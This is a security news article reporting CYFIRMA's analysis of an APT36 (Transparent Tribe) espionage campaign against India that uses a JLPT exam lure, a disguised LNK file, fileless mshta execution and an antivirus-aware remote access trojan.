Transparent Tribe Weaponizes “JLPT” Tests in New Cyber-Espionage Campaign Against India

A seemingly harmless notification about a Japanese language proficiency exam has become the latest vector for state-aligned cyber espionage. A new investigation by CYFIRMA has uncovered a sophisticated malware campaign attributed to APT36 (also known as Transparent Tribe), a Pakistan-aligned threat actor known for targeting Indian governmental and strategic entities.

The campaign, tracked since December 2025, marks a dangerous evolution in the group’s tactics, moving away from simple phishing to complex, “fileless” attacks designed to evade detection by modern security software.

The attack begins with a classic lure: a ZIP archive titled “Online JLPT Exam Dec 2025.zip”. Inside sits what appears to be a PDF document.

According to the analysis, the file is actually a massive Windows Shortcut (LNK) file—swollen to over 2MB to mimic the weight of a real document—that triggers a malicious chain reaction when clicked.

“The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” the report states.

To maintain the illusion, the malware even opens a legitimate decoy PDF containing exam instructions while it silently infects the system in the background.

What makes this campaign particularly potent is its refusal to drop traditional malware files onto the hard drive immediately. Instead, it “lives off the land,” abusing trusted Windows tools to do its dirty work.

Upon execution, the LNK file calls upon mshta.exe, a legitimate Windows utility, to download and run a malicious script from a remote server.

“Execution of the LNK file leverages the trusted Windows binary mshta.exe to retrieve and execute attacker controlled HTA content in a fileless manner,” CYFIRMA researchers explained.

This “fileless” approach allows the malware to decrypt and assemble its payload entirely within the computer’s memory, leaving few footprints for forensic teams to find.

Perhaps the most alarming feature of this new strain is its awareness. The malware doesn’t just run blindly; it surveys the battlefield. It scans the infected computer for specific antivirus products—including Kaspersky, Quick Heal, Avast, and Bitdefender—and changes its behavior accordingly to stay hidden.

“The malware implements antivirus aware persistence mechanisms and encrypted command and control communications, enabling long term access… while minimizing forensic artifacts and detection”.

For instance, if it detects “Quick Heal,” it uses a specific batch file method to maintain persistence. If it finds “Kaspersky,” it shifts tactics to a different directory structure.

Once entrenched, the malware functions as a fully featured Remote Access Trojan (RAT), turning the victim’s computer into a spy post. It can capture screenshots, log keystrokes, and hunt for sensitive files like Office documents and PDFs.

“Collectively, these capabilities confirm the malware’s role as an espionage focused RAT supporting surveillance, data exfiltration, and remote system control”.

The malware even includes a “clipboard manipulation” module, potentially allowing attackers to steal credentials or hijack cryptocurrency transactions.

Security experts warn that this campaign represents a significant step up for APT36. By combining social engineering with adaptive, memory-based malware, the group is becoming a harder target to track.

“This operation demonstrates a notable evolution in APT36’s tradecraft, characterized by the sophisticated abuse of trusted Windows components, file format deception, and multi-stage, fileless execution techniques”.

Organizations in the target sectors are urged to treat any unsolicited “exam” notifications or unexpected PDF attachments with extreme caution.